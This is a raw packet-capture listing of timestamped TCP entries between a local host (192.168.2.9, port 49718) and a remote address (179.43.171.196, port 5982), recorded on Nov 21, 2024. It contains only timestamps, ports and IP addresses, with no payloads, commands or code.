                                                                                                                                                              Nov 21, 2024 11:27:06.673048973 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.673127890 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.674272060 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.674290895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.674326897 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.674973011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.674985886 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.675023079 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.675772905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.675785065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.675828934 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.676440001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.676506996 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.676811934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.677436113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.677449942 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.677505016 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.678123951 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.678177118 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.678702116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.679276943 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.679299116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.679335117 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.679975033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.680027962 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.680221081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.680706978 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.680778027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.680808067 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.681844950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.681862116 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.681891918 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.682410002 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.682461977 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.682498932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.683684111 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.683743000 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.822844028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.822942972 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.823012114 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.823224068 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.823537111 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.823585033 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.824079990 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.824203014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.824246883 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.824955940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.825126886 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.825177908 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.825825930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.826004028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.826117992 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.826695919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.826828003 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.826869965 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.827542067 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.827586889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.827627897 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.836327076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.836378098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.836431980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.836658001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.836703062 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.836764097 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.837543964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.837656975 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.837699890 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.838382959 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.838659048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.838700056 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.838785887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.839483023 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.839534044 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.839591980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.840357065 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.840400934 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.840476990 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.841219902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.841268063 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.841316938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.842081070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.842130899 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.842201948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.842962980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.843005896 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.843070030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.843868971 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.843914986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.843976021 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.844651937 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.844726086 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.844786882 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.845573902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.845623016 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.845727921 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.846378088 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.846431971 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.846470118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.847256899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.847302914 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.847311020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.848090887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.848165035 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.848207951 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.848934889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.848982096 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.849025965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.849778891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.849831104 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.849849939 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.850650072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.850699902 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.850754023 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.851536989 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.851583004 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.851640940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.852360010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.852415085 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.852525949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.853256941 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.853303909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.853305101 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.854072094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854124069 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.854198933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854943037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854986906 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.854999065 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.856014967 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.856066942 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.856141090 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.856729031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.856781960 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.856821060 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.857547998 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.857604980 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.857709885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.858374119 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.858428001 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.858458042 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.859220982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.859267950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.859267950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.860084057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.860137939 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.860178947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.860987902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861044884 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.861197948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861876011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861907005 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.861934900 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.862647057 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.862698078 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.862797976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.863550901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.863596916 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.863660097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.864391088 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.864448071 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.864461899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.865245104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.865293026 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.865325928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.866115093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.866163969 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.866215944 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.866988897 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.867053986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.867079973 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.867810011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.867861986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.867913961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.868678093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.868736029 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.868789911 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.869561911 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.869616032 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.869637012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.870460033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.870507956 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.870568037 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.871237040 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.871292114 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.871371031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.872102022 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.872148037 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.872203112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.872972012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.873002052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.873019934 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.873886108 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.873939037 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.874015093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.874785900 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.874835968 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.874918938 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.875503063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.875560045 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.014909983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.015013933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.015074015 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.015394926 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.015500069 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.015558958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.016212940 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.016302109 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.016349077 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.017064095 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.017182112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.017245054 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.017913103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.018029928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.018174887 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.018791914 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.018891096 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.018938065 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.019668102 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.019777060 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.019828081 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.028337955 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.028417110 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.028470039 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.028781891 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.028949976 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.028995991 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.029568911 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.029625893 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.029670954 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.030380011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.030637980 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.030689001 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.030745983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.031493902 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.031544924 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.031579018 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.032406092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.032479048 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.032531023 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.033219099 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.033269882 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.033385038 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.034073114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.034120083 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.034255028 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.034951925 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.035029888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.035058975 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.035814047 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.035864115 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.035923004 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.036643982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.036690950 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.036770105 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.037537098 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.037585974 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.037661076 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.038374901 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.038435936 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.038547993 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.039263010 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.039319038 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.039432049 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.040103912 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.040165901 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.040188074 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.040961981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.041013956 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.041084051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.041835070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.041891098 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.041929960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.042681932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.042747021 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.042748928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.043498993 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.043554068 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.043611050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.044369936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.044461012 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.044471979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.045211077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.045270920 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.045303106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.046113014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.046200991 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.046231031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.046960115 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.047009945 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.047063112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.047811031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.047904015 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.047910929 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.048652887 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.048707008 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.048768997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.049530029 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.049585104 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:07.049612999 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:07.050518036 CET598249718179.43.171.196192.168.2.9
